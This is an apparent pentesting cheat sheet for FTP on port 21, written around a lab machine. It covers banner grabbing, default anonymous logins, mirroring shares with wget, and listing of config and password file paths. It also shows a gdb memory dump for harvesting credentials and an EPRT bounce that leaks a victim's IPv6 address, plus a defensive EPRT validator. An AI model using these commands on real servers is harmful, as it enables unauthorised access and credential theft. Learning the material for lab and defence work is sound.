21 - FTP

Connect and grab the banner (plain and with explicit TLS):

```bash
nc -vn <IP> 21
openssl s_client -connect somesite.com:21 -starttls ftp
```

Anonymous login (user : password):

```
anonymous : anonymous
anonymous :
ftp : ftp
```

Mirror everything reachable over anonymous FTP (active mode if passive fails):

```bash
wget -m ftp://anonymous:anonymous@10.10.10.98
wget -m --no-passive ftp://anonymous:anonymous@10.10.10.98
```

Configuration files:

```
/etc/ftpusers
/etc/ftpd.conf
/etc/proftpd.conf
/etc/proftpd/proftpd.conf
/etc/proftpd/ftpd.passwd
/etc/vsftpd.conf
/etc/vsftpd/ftpusers
/etc/vsftpd/user_list
```

Dump the FTP process memory

Attach to the FTP process and dump its memory, in the hope of finding credentials.

```
$ gdb -p <FTP_PROCESS_PID>
(gdb) info proc mappings
(gdb) q
(gdb) dump memory /tmp/<name>.mem <START_HEAD> <END_HEAD>
(gdb) q
$ strings /tmp/<name>.mem

// Alternative to 'info proc mappings' to get heap start-end address
(gdb) ! grep heap /proc/<PID>/maps
```

EPRT (RFC 2428)

RFC 2428 defines the EPRT command, which tells the FTP server which host and port to open the data connection to, so it can be used to make the server connect to another host. The following are sample EPRT commands:

```
EPRT |1|132.235.1.2|6275|
EPRT |2|1080::8:800:200C:417A|5282|
```

EPRT can be used to make a victim FTP server open a connection back to our attacking device, in order to disclose the victim's IPv6 address. EPRT isn't exposed as a "normal" command by the ftp client; it is a raw FTP protocol command, so instead of the ftp client you connect to port 21 with telnet and type it yourself.

```
$ telnet zetta.htb 21
220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
USER 6OJCaGVYOJKtY3zFFQUTmtZNl8BHEuq5
331 User 6OJCaGVYOJKtY3zFFQUTmtZNl8BHEuq5 OK. Password required
PASS 6OJCaGVYOJKtY3zFFQUTmtZNl8BHEuq5
```

Capture the incoming IPv6 connection with tcpdump:

```
$ tcpdump -i tun0 -vv ip6
tcpdump: listening on tun0, link-type RAW (Raw IP), capture size 262144 bytes
09:12:32.613603 IP6 (flowlabel 0x6bdb7, hlim 63, next-header TCP (6) payload length: 40) dead:beef::250:56ff:feb9:df29.37250 > kali.4488: Flags [S], cksum 0x64d3 (correct), seq 1305187145, win 28800, options [mss 1337,sackOK,TS val 374756922 ecr 0,nop,wscale 7], length 0
09:12:32.613626 IP6 (flowlabel 0xbe7b8, hlim 64, next-header TCP (6) payload length: 20) kali.4488 > dead:beef::250:56ff:feb9:df29.37250: Flags [R.], cksum 0xa938 (correct), seq 0, ack 1305187146, win 0, length 0
```

Victim IPv6 address: dead:beef::250:56ff:feb9:df29
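The reason the EPRT trick above works is that the server opens the data connection to whatever address the client names. As an added example (not code from the original page), this parser implements the RFC 2428 EPRT syntax shown in the sample commands and the check a hardened server applies to it: the requested address must be the address the control connection came from. The peer addresses used are constructed sample values.

```python
import ipaddress
from typing import NamedTuple, Union

IPAddr = Union[ipaddress.IPv4Address, ipaddress.IPv6Address]


class Eprt(NamedTuple):
    family: int      # RFC 2428 net-prt: 1 = IPv4, 2 = IPv6
    address: IPAddr  # parsed net-addr
    port: int        # tcp-port


def parse_eprt(line: str) -> Eprt:
    """Parse 'EPRT <d><net-prt><d><net-addr><d><tcp-port><d>' (RFC 2428)."""
    verb, _, arg = line.strip().partition(" ")
    if verb.upper() != "EPRT" or len(arg) < 2:
        raise ValueError("not an EPRT command")
    d = arg[0]  # delimiter: any single printable ASCII char (33-126)
    if not 33 <= ord(d) <= 126 or not arg.endswith(d):
        raise ValueError("bad delimiter")
    fields = arg[1:-1].split(d)
    if len(fields) != 3:
        raise ValueError("expected exactly three fields")
    fam_s, addr_s, port_s = fields
    if fam_s not in ("1", "2"):
        raise ValueError("unknown network protocol %r" % fam_s)
    family = int(fam_s)
    addr = ipaddress.ip_address(addr_s)  # raises ValueError on garbage
    if addr.version != (4 if family == 1 else 6):
        raise ValueError("net-addr does not match net-prt family")
    if not port_s.isdigit() or not 1 <= int(port_s) <= 65535:
        raise ValueError("bad port")
    return Eprt(family, addr, int(port_s))


def data_conn_allowed(line: str, control_peer: str) -> bool:
    """Hardened-server policy: only open the data connection back to the
    host that owns the control connection, so an EPRT naming a third host
    (the bounce described on this page) is refused."""
    try:
        req = parse_eprt(line)
    except ValueError:
        return False
    return req.address == ipaddress.ip_address(control_peer)


if __name__ == "__main__":
    # constructed control-connection peers for the two sample commands
    print(data_conn_allowed("EPRT |2|1080::8:800:200C:417A|5282|", "1080::8:800:200c:417a"))  # True
    print(data_conn_allowed("EPRT |1|132.235.1.2|6275|", "10.10.10.98"))                      # False
```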